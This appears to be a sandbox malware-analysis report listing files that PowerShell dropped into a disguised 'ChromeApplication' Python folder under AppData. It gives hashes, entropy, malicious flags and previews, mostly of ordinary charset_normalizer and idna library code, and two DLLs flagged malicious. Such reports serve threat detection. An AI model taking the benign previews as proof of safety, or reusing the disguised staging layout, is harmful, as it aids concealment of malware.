                                                                                                                                                                                                  Preview:import importlib..from codecs import IncrementalDecoder..from collections import Counter..from functools import lru_cache..from typing import Counter as TypeCounter, Dict, List, Optional, Tuple....from .constant import (.. FREQUENCIES,.. KO_NAMES,.. LANGUAGE_SUPPORTED_COUNT,.. TOO_SMALL_SEQUENCE,.. ZH_NAMES,..)..from .md import is_suspiciously_successive_range..from .models import CoherenceMatches..from .utils import (.. is_accentuated,.. is_latin,.. is_multi_byte_encoding,.. is_unicode_range_secondary,.. unicode_range,..)......def encoding_unicode_range(iana_name: str) -> List[str]:.. """.. Return associated unicode ranges in a single byte code page... """.. if is_multi_byte_encoding(iana_name):.. raise IOError("Function not supported on multi-byte code page").... decoder = importlib.import_module(.. "encodings.{}".format(iana_name).. ).IncrementalDecoder.... p: IncrementalDecoder = decoder(errors="ignore").. seen_ran

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\charset_normalizer\cli\__init__.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):106
                                                                                                                                                                                                  Entropy (8bit):4.336412994117974
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:3:1L6jZKXRYF0AaUFvLzaqDFoNW/kJM7RActNL4op:1Lu0BgounD6WsJM7ZtZ4op
                                                                                                                                                                                                  MD5:FAC8FDA8B9C67E4FE079EB2B712EA666
                                                                                                                                                                                                  SHA1:DCA37B0BF798ABC6801A97100549400939882371
                                                                                                                                                                                                  SHA-256:08EC0FF1F2B6A9BBA574C7A6DA52FCD4989E63E3C80361B6199E487403CC3C50
                                                                                                                                                                                                  SHA-512:01EBCBA22F54C86A9C4B7093523C1729917E097C29F626F6940AA71AA39622AE5D8DFB2272AF0ED64976795477B3ED1E881EA2FB9B17612664E60C28AC454DEA
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:from .__main__ import cli_detect, query_yes_no....__all__ = (.. "cli_detect",.. "query_yes_no",..)..

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\charset_normalizer\cli\__main__.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):10040
                                                                                                                                                                                                  Entropy (8bit):4.016136127999308
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:192:ZVqYUPQuTDuX0gWP7EkjzetFJltUlHHiThp:ZVqYUP5DD7EG+FJltUlcH
                                                                                                                                                                                                  MD5:736969E9EFF624D9D34708313644E6F6
                                                                                                                                                                                                  SHA1:A69D7BF335809168C95DE7818DE592F2E47AC996
                                                                                                                                                                                                  SHA-256:AECF9C062A41CEBEDDD1301A51AD271B8AAB8D785D75D782541F9FE97B7FC12D
                                                                                                                                                                                                  SHA-512:91A2E0F161502AE170A0E1708C02C5968D06A1B27E401D021A5D4F55D04B9A6F12E4BAF563290B95699151D10DC58ADD3732AFA40A0554E730139911EB46A8F2
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:import argparse..import sys..from json import dumps..from os.path import abspath, basename, dirname, join, realpath..from platform import python_version..from typing import List, Optional..from unicodedata import unidata_version....import charset_normalizer.md as md_module..from charset_normalizer import from_fp..from charset_normalizer.models import CliDetectionResult..from charset_normalizer.version import __version__......def query_yes_no(question: str, default: str = "yes") -> bool:.. """Ask a yes/no question via input() and return their answer..... "question" is a string that is presented to the user... "default" is the presumed answer if the user just hits <Enter>... It must be "yes" (the default), "no" or None (meaning.. an answer is required of the user)..... The "answer" return value is True for "yes" or False for "no"..... Credit goes to (c) https://stackoverflow.com/questions/3041986/apt-command-line-interface-like-yes-no-input.. """.. vali

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\charset_normalizer\constant.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, Unicode text, UTF-8 text executable, with CRLF line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):42476
                                                                                                                                                                                                  Entropy (8bit):4.506500945749441
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:768:wpR63vF6I6dA1qmi8ER7GapnRw89g/4u/A7pLP8A8vnmsFIGFz:463vH6dAUmiPY5uI
                                                                                                                                                                                                  MD5:4C832423BA35785DCC80B0DDBD9207E0
                                                                                                                                                                                                  SHA1:552FF010E2EBFE3DA0E6F38310BBC47220CEB833
                                                                                                                                                                                                  SHA-256:DAD56B5D0F5CBC2F23B746FC819CD15EF5ED7B5A556D1ADAD00E5D3960D049AA
                                                                                                                                                                                                  SHA-512:E3DCF75CF381374E429FF131D156B01CD6ED32B77170B06EC9762CC97E074805E44003991CEBFF485061BDE89D865E8FC5D5EBECA569207AA2609E70260AE742
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:# -*- coding: utf-8 -*-..from codecs import BOM_UTF8, BOM_UTF16_BE, BOM_UTF16_LE, BOM_UTF32_BE, BOM_UTF32_LE..from encodings.aliases import aliases..from re import IGNORECASE, compile as re_compile..from typing import Dict, List, Set, Union....# Contain for each eligible encoding a list of/item bytes SIG/BOM..ENCODING_MARKS: Dict[str, Union[bytes, List[bytes]]] = {.. "utf_8": BOM_UTF8,.. "utf_7": [.. b"\x2b\x2f\x76\x38",.. b"\x2b\x2f\x76\x39",.. b"\x2b\x2f\x76\x2b",.. b"\x2b\x2f\x76\x2f",.. b"\x2b\x2f\x76\x38\x2d",.. ],.. "gb18030": b"\x84\x31\x95\x33",.. "utf_32": [BOM_UTF32_BE, BOM_UTF32_LE],.. "utf_16": [BOM_UTF16_BE, BOM_UTF16_LE],..}....TOO_SMALL_SEQUENCE: int = 32..TOO_BIG_SEQUENCE: int = int(10e6)....UTF8_MAXIMAL_ALLOCATION: int = 1_112_064....# Up-to-date Unicode ucd/15.0.0..UNICODE_RANGES_COMBINED: Dict[str, range] = {.. "Control character": range(32),.. "Basic Latin": range(32, 128),.. "Latin-1 Supplement": range(1

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\charset_normalizer\legacy.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):2125
                                                                                                                                                                                                  Entropy (8bit):4.7244650981655125
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:48:/Y+Lw2ERLYA5yD3ShiUB757v/bKnCjRi6kRqzBQJB7riYeJ0rG6wTW:/Y+LfERLpyD3S/95773aWL0rG6wTW
                                                                                                                                                                                                  MD5:A5026121DAE2BAF5F556823179F94C2D
                                                                                                                                                                                                  SHA1:041A659F5E04949F0D66F192412F8EC7974BBEB3
                                                                                                                                                                                                  SHA-256:29B271129BBB83ACC4DAE5D20774FEDF5EFC72089241D549949998FA0BF71003
                                                                                                                                                                                                  SHA-512:D5A963006ABD8FE71B1C5A66F44603E2D4EC17E4F90D6E1A2A30C66DEC38D1D482BD2C713A1A3251E8A2652806A6315A2B23A69ED84E8CB11B743A75ADBCF948
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:from typing import Any, Dict, Optional, Union..from warnings import warn....from .api import from_bytes..from .constant import CHARDET_CORRESPONDENCE......def detect(.. byte_str: bytes, should_rename_legacy: bool = False, **kwargs: Any..) -> Dict[str, Optional[Union[str, float]]]:.. """.. chardet legacy method.. Detect the encoding of the given byte string. It should be mostly backward-compatible... Encoding name will match Chardet own writing whenever possible. (Not on encoding name unsupported by it).. This function is deprecated and should be used to migrate your project easily, consult the documentation for.. further information. Not planned for removal..... :param byte_str: The byte sequence to examine... :param should_rename_legacy: Should we rename legacy encodings.. to their more modern equivalents?.. """.. if len(kwargs):.. warn(.. f"charset-normalizer disregard arguments '{','.join(list(k

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\charset_normalizer\md.cp310-win32.pyd

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):8704
                                                                                                                                                                                                  Entropy (8bit):5.122487232944936
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:96:YflUp1oDPmhFgodhRSKcC5WJ1ks/vnnZjOwCF1oMmGffQzQkT16:6lu1oDPm57SKPWJzvZjOOMVnET4
                                                                                                                                                                                                  MD5:492FC2C3D9E5D652C8D6EE1A0E3F9E94
                                                                                                                                                                                                  SHA1:40C8EA35116D23EF992B0633795258A1ED044A35
                                                                                                                                                                                                  SHA-256:F1EF1EBEDA3306B95ACA52F89C49DD9943768C274AC2DB8E4A6A1B303952C106
                                                                                                                                                                                                  SHA-512:B1B78F6F9323FFF9D83F8ED682FCB48A30DEE5C95B1178C6C567C99CA5BD9BC2C19CD067BDC74A84F387A08FA649F7F7C4FB71D05A529FBE29D3A98B2271E1FF
                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......................Y......................................'..............................5...........Rich...........PE..L....hAe...........!...%..................... ...............................`............@.........................@%..l....%..d....@.......................P..T....!...............................!..@............ ..x............................text............................... ..`.rdata.. .... ......................@..@.data........0......................@....rsrc........@......................@..@.reloc..T....P....... ..............@..B........................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\charset_normalizer\md.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, Unicode text, UTF-8 text executable, with CRLF line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):20239
                                                                                                                                                                                                  Entropy (8bit):4.462176748433946
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:192:X+NrqaBrMK0lzOXSSSI7IRmVf/L9t8/T/D/VnrgzfEz6zkzrD/UdBWgWHzW9k5G6:UrqaidOXkI7IRmV79PfKEqrlgWTTr
                                                                                                                                                                                                  MD5:D22F1E5694206C2089871189EE9CEFF6
                                                                                                                                                                                                  SHA1:D573C1456C0FBF637480436F2402550AC827DE20
                                                                                                                                                                                                  SHA-256:17B4B4D3535D3E0900A266B6C39F7C21DC767255BD9635E544860A6502AC0900
                                                                                                                                                                                                  SHA-512:6B6D277E614E82549B8E3389E6D657490CB7B367A5F4D7BF73681827008FCF491909915362F387AD62950515C8560C20D00AEBB71E33A4A96643C027D1096D33
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:from functools import lru_cache..from logging import getLogger..from typing import List, Optional....from .constant import (.. COMMON_SAFE_ASCII_CHARACTERS,.. TRACE,.. UNICODE_SECONDARY_RANGE_KEYWORD,..)..from .utils import (.. is_accentuated,.. is_arabic,.. is_arabic_isolated_form,.. is_case_variable,.. is_cjk,.. is_emoticon,.. is_hangul,.. is_hiragana,.. is_katakana,.. is_latin,.. is_punctuation,.. is_separator,.. is_symbol,.. is_thai,.. is_unprintable,.. remove_accent,.. unicode_range,..)......class MessDetectorPlugin:.. """.. Base abstract class used for mess detection plugins... All detectors MUST extend and implement given methods... """.... def eligible(self, character: str) -> bool:.. """.. Determine if given character should be fed in... """.. raise NotImplementedError # pragma: nocover.... def feed(self, character: str) -> None:.. """.. The main routine to

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\charset_normalizer\md__mypyc.cp310-win32.pyd

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):101376
                                                                                                                                                                                                  Entropy (8bit):6.4980262678085285
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:1536:pZcxP+DzstYWMWl0h79jbBrVA+wP1IS+ODqmM7kCufB:rA+DwtYWMOi9vbAXIwDqmM7kCa
                                                                                                                                                                                                  MD5:B097E1BCB848F7E75F9E18D80037AA82
                                                                                                                                                                                                  SHA1:A461A995132548F2A7CD44311165DAF19512889C
                                                                                                                                                                                                  SHA-256:240074887EA15325E081D6291F019FF929639C5803D4562CF0134A235A376529
                                                                                                                                                                                                  SHA-512:50274BA7D7F5AA501275EC8AE24807D57A288BAFD380D2557021DB7855C7B87BCAF669B222740BBF240D1C1B907C378F6CEC8CBCFE2FB620A159509BB192B21D
                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......u.8f1dV51dV51dV58..57dV5$.W43dV5z.W43dV5$.S4=dV5$.R4;dV5$.U43dV5..W42dV51dW5.dV5..^40dV5..V40dV5..50dV5..T40dV5Rich1dV5........................PE..L....hAe...........!...%............0........ ............................................@..........................T..`....T..x....................................P..............................0P..@............ ..@............................text............................... ..`.rdata..0C... ...D..................@..@.data.... ...p.......T..............@....rsrc................n..............@..@.reloc...............p..............@..B........................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\charset_normalizer\models.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):11964
                                                                                                                                                                                                  Entropy (8bit):4.479965853888732
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:192:my01bEHbOSe118Desz7UZTM5ms3a0qWTpGrQ9uPCG/fbtk3:my01oHbOSe118DeEUMAs3a0qWTUrQ9VP
                                                                                                                                                                                                  MD5:175CE316FB854AC25E5130D7669C8FD4
                                                                                                                                                                                                  SHA1:DFC05FA794BFF41C49C4BB9F2BF57873573D843B
                                                                                                                                                                                                  SHA-256:0257A1BB218313BE2386BCA383A4D39188753029ED7F15C57C68538B47ACBBE6
                                                                                                                                                                                                  SHA-512:923497F99F8D2B3E969000C6F9F26B60EF69899FCA16159DABA5024CA0C1BC64430681BB86EE29E3D2650E09BEE4CCB1B416A96ED05DC83D1AE08FF3AF8B4485
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:from encodings.aliases import aliases..from hashlib import sha256..from json import dumps..from typing import Any, Dict, Iterator, List, Optional, Tuple, Union....from .constant import TOO_BIG_SEQUENCE..from .utils import iana_name, is_multi_byte_encoding, unicode_range......class CharsetMatch:.. def __init__(.. self,.. payload: bytes,.. guessed_encoding: str,.. mean_mess_ratio: float,.. has_sig_or_bom: bool,.. languages: "CoherenceMatches",.. decoded_payload: Optional[str] = None,.. ):.. self._payload: bytes = payload.... self._encoding: str = guessed_encoding.. self._mean_mess_ratio: float = mean_mess_ratio.. self._languages: CoherenceMatches = languages.. self._has_sig_or_bom: bool = has_sig_or_bom.. self._unicode_ranges: Optional[List[str]] = None.... self._leaves: List[CharsetMatch] = [].. self._mean_coherence_ratio: float = 0.0.... self._output_payload: Optional[b

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\charset_normalizer\utils.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, Unicode text, UTF-8 text executable, with CRLF line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):12315
                                                                                                                                                                                                  Entropy (8bit):4.8657023319997865
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:192:x1b00QwX/GbGxPGuCvLjjKe9vIjp6JDvHwWTbCt04gKd7NW3wLVi8w0FN/4Cldw:xEW2WWrLSt04ZUAz3Fx4Cldw
                                                                                                                                                                                                  MD5:921C1C9D4EC51242C94566CB4A45FA39
                                                                                                                                                                                                  SHA1:3C69EA1CED33F8F2C362FE2FC9EE1717935FD0D8
                                                                                                                                                                                                  SHA-256:8E3BDF4971C90FA40F831731231E2EB6C385C773F116CB1679FD48631037B8AB
                                                                                                                                                                                                  SHA-512:F702B83A4FD7052A0204DAB95C6A5892B025511F1E626B30A368A1C99DDDCED733E24AA82B584981589C6BB05C7EB54D50CB3364208F243650F7416C4B9C6152
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:import importlib..import logging..import unicodedata..from codecs import IncrementalDecoder..from encodings.aliases import aliases..from functools import lru_cache..from re import findall..from typing import Generator, List, Optional, Set, Tuple, Union....from _multibytecodec import MultibyteIncrementalDecoder....from .constant import (.. ENCODING_MARKS,.. IANA_SUPPORTED_SIMILAR,.. RE_POSSIBLE_ENCODING_INDICATION,.. UNICODE_RANGES_COMBINED,.. UNICODE_SECONDARY_RANGE_KEYWORD,.. UTF8_MAXIMAL_ALLOCATION,..)......@lru_cache(maxsize=UTF8_MAXIMAL_ALLOCATION)..def is_accentuated(character: str) -> bool:.. try:.. description: str = unicodedata.name(character).. except ValueError:.. return False.. return (.. "WITH GRAVE" in description.. or "WITH ACUTE" in description.. or "WITH CEDILLA" in description.. or "WITH DIAERESIS" in description.. or "WITH CIRCUMFLEX" in description.. or "WITH TILDE" in description..

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\charset_normalizer\version.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):85
                                                                                                                                                                                                  Entropy (8bit):4.459711237162507
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:3:IQVNHXL9vHutvyW7yRLrF6qgHzB:ImbMVyTF6fHzB
                                                                                                                                                                                                  MD5:CBABD0C4C4A929A4C7BD4CFEC9EE5DE2
                                                                                                                                                                                                  SHA1:5C05537610FF76D4C917A8FDEC4308F07BD20D8E
                                                                                                                                                                                                  SHA-256:AB77C5D76C46941B9AB9BE64AE84D9B7B9413D02CEDE416F327928127B7EE980
                                                                                                                                                                                                  SHA-512:E253662E6B293AAD35FC978FBD9A35EF30BF49F73F9FD09B4E73A7F3459D7952CEA8D7D36134ABDBD213EE60995A8A083E4E239205CC5522BEED7FC9C6935186
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:"""..Expose version.."""....__version__ = "3.3.2"..VERSION = __version__.split(".")..

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\distutils-precedence.pth

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):151
                                                                                                                                                                                                  Entropy (8bit):4.923660846981479
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:3:JSxYEVoC2gxAxCKKFuGA0jpSHEeGMMrMePAoSoKBW6BMW2y+C1e5k:aYEVo10AxCKeuXypcrNB96W2y+Bk
                                                                                                                                                                                                  MD5:18D27E199B0D26EF9B718CE7FF5A8927
                                                                                                                                                                                                  SHA1:EA9C9BFC82AD47E828F508742D7296E69D2226E4
                                                                                                                                                                                                  SHA-256:2638CE9E2500E572A5E0DE7FAED6661EB569D1B696FCBA07B0DD223DA5F5D224
                                                                                                                                                                                                  SHA-512:B8504949F3DDF0089164B0296E8371D7DCDD4C3761FB17478994F5E6943966528A45A226EBA2D5286B9C799F0EB8C99BD20CBD8603A362532B3A65DD058FA42E
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:import os; var = 'SETUPTOOLS_USE_DISTUTILS'; enabled = os.environ.get(var, 'local') == 'local'; enabled and __import__('_distutils_hack').add_shim(); .

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\idna\__init__.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):868
                                                                                                                                                                                                  Entropy (8bit):4.508866310558911
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:24:1mveEaF+vqnuZ9UeAlFYdsyGF66xorAqv:/LcsYdsye66+rf
                                                                                                                                                                                                  MD5:813A3685E48B6DC4359ACF6EDE226D5F
                                                                                                                                                                                                  SHA1:D4AF52A5C4F468358F49FE8CF0A91586958B9F91
                                                                                                                                                                                                  SHA-256:30FA8D0CB65B5EA19A35D5F1005862A853CA1105E3BB68CD42109ECBAFB97893
                                                                                                                                                                                                  SHA-512:9BF3422A73153476A88A02C0692E7E831B754D2FFA9858F1D4EF36EB1D9F33654672DEF22C8A0F392D9254FE64D66557AAD964923162B080DE6542B5A2E54952
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:from .core import (. IDNABidiError,. IDNAError,. InvalidCodepoint,. InvalidCodepointContext,. alabel,. check_bidi,. check_hyphen_ok,. check_initial_combiner,. check_label,. check_nfc,. decode,. encode,. ulabel,. uts46_remap,. valid_contextj,. valid_contexto,. valid_label_length,. valid_string_length,.).from .intranges import intranges_contain.from .package_data import __version__..__all__ = [. "__version__",. "IDNABidiError",. "IDNAError",. "InvalidCodepoint",. "InvalidCodepointContext",. "alabel",. "check_bidi",. "check_hyphen_ok",. "check_initial_combiner",. "check_label",. "check_nfc",. "decode",. "encode",. "intranges_contain",. "ulabel",. "uts46_remap",. "valid_contextj",. "valid_contexto",. "valid_label_length",. "valid_string_length",.].

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\idna\codec.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):3422
                                                                                                                                                                                                  Entropy (8bit):4.317350903066924
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:48:Ej6Q796QeYUV+K6QZ7cgGlFi2Wa696Q+CFLcg2lFiIDnGvqvdm/WHqSJv:6/9CYUV1t7zGfihH9tLz2fiHiFdqSh
                                                                                                                                                                                                  MD5:ABCF05AEC6DB6B1DCEF409433F57FCD2
                                                                                                                                                                                                  SHA1:C326EA0E90CD4AD5638AB0C33A649080C002CEF3
                                                                                                                                                                                                  SHA-256:3C47B0DC8B70CE35B887299B6AC9EDCB6376397BCD7201C1F898EB06EC473D86
                                                                                                                                                                                                  SHA-512:7CE10E54C449901D0A092CD657AD7870FE8B72BB9654313715AC440D83709BE675B1016FDCB606F84D0B31410DA31CE81EDF995FE3481DEC924DB38AFCA79BF7
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:import codecs.import re.from typing import Any, Optional, Tuple..from .core import IDNAError, alabel, decode, encode, ulabel.._unicode_dots_re = re.compile("[\u002e\u3002\uff0e\uff61]")...class Codec(codecs.Codec):. def encode(self, data: str, errors: str = "strict") -> Tuple[bytes, int]:. if errors != "strict":. raise IDNAError('Unsupported error handling "{}"'.format(errors)).. if not data:. return b"", 0.. return encode(data), len(data).. def decode(self, data: bytes, errors: str = "strict") -> Tuple[str, int]:. if errors != "strict":. raise IDNAError('Unsupported error handling "{}"'.format(errors)).. if not data:. return "", 0.. return decode(data), len(data)...class IncrementalEncoder(codecs.BufferedIncrementalEncoder):. def _buffer_encode(self, data: str, errors: str, final: bool) -> Tuple[bytes, int]:. if errors != "strict":. raise IDNAError('Unsupported error handli

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\idna\compat.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):316
                                                                                                                                                                                                  Entropy (8bit):4.675723792199159
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:6:1REYBFibXKGcQF6c8bNdPl6rZ9vUPLqBAII6A0vURy6QyneAJFHkwIDO:1REYBh618vPl6FCzTIL8Ry6fnbHIDO
                                                                                                                                                                                                  MD5:481871CD052957124183A01FED88B799
                                                                                                                                                                                                  SHA1:B422D026EFA3D16AEEB49683D2CC3CD62C26BBC1
                                                                                                                                                                                                  SHA-256:4732F2E90402765F7BF3868585BD845FD10A1822638343F73E294675E5D7731F
                                                                                                                                                                                                  SHA-512:C37ADAC2C04F58FE0EE9A1915EAA809050CA40B2008CFCF13124F76973D0725DC61D1EE59FD2A883BBD5CFE3C09A2DA782C9D1F1042641E35ACAC4C95EF416A5
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:from typing import Any, Union..from .core import decode, encode...def ToASCII(label: str) -> bytes:. return encode(label)...def ToUnicode(label: Union[bytes, bytearray]) -> str:. return decode(label)...def nameprep(s: Any) -> None:. raise NotImplementedError("IDNA 2008 does not utilise nameprep protocol").

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\idna\core.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):13650
                                                                                                                                                                                                  Entropy (8bit):4.46864061978377
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:192:xdqxD3m5oyqUN+Mt8rOrhNZjGs3Le+yrYfpR0cy1YQ7Up9uusBAgfwNKCx04SfSC:+iN/3Le+yrY/0j1YQUz+BHfOmfSC
                                                                                                                                                                                                  MD5:1AC8E75205145E83F27AF5E0A6C6A9EC
                                                                                                                                                                                                  SHA1:A29FFD855B5E2D971A25672E3043A1EB396FC3EB
                                                                                                                                                                                                  SHA-256:020D34602B8B6C8AD3BFBBA472E8F85CB68B63FC327810B3E67BBDAF6FC3DEE8
                                                                                                                                                                                                  SHA-512:38B3DD96ADD4CFB430C3D15AFE6A562B50CFD109495756C15E3C98758410CE084315AFF5B92CF5490C433F1BF04F56060605A6786B22AACB12A6AB45C1868AD2
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:import bisect.import re.import unicodedata.from typing import Optional, Union..from . import idnadata.from .intranges import intranges_contain.._virama_combining_class = 9._alabel_prefix = b"xn--"._unicode_dots_re = re.compile("[\u002e\u3002\uff0e\uff61]")._ldh = (. 48,. 49,. 50,. 51,. 52,. 53,. 54,. 55,. 56,. 57,. 95,. 97,. 98,. 99,. 100,. 101,. 102,. 103,. 104,. 105,. 106,. 107,. 108,. 109,. 110,. 111,. 112,. 113,. 114,. 115,. 116,. 117,. 118,. 119,. 120,. 121,. 122,.)...class IDNAError(UnicodeError):. """Base exception for all IDNA-encoding related problems""".. pass...class IDNABidiError(IDNAError):. """Exception when bidirectional requirements are not satisfied""".. pass...class InvalidCodepoint(IDNAError):. """Exception when a disallowed or unallocated codepoint is used""".. pass...class InvalidCodepointContext(IDNAError):. """Exception when the code

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\idna\idnadata.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):79623
                                                                                                                                                                                                  Entropy (8bit):3.5629144753775273
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:768:9IFeZ8ek6rfUqCzfQnyUgMtsbruOz/yKae9hLXnoFDuZNBrVk+4VjIN:Dh3Uryyc6/MtF+T
                                                                                                                                                                                                  MD5:4B8AB107F7FD8DD839534F15B0722957
                                                                                                                                                                                                  SHA1:799F552EE255887C6E8504FCF6559CFCDF5B0C8B
                                                                                                                                                                                                  SHA-256:486F2385A184E778A20FA078F69B76A704EFFD4BC295C89613E379E28476A785
                                                                                                                                                                                                  SHA-512:C5E9ABFA9F900162EBA5E25D532508E7845AC1A33C679783A4AAFA094F5D88CC33BB02A353C95EFF1395F76BFB1EF93BB8E07543D3865CC6520248F313FFC1A4
                                                                                                                                                                                                  Malicious:false
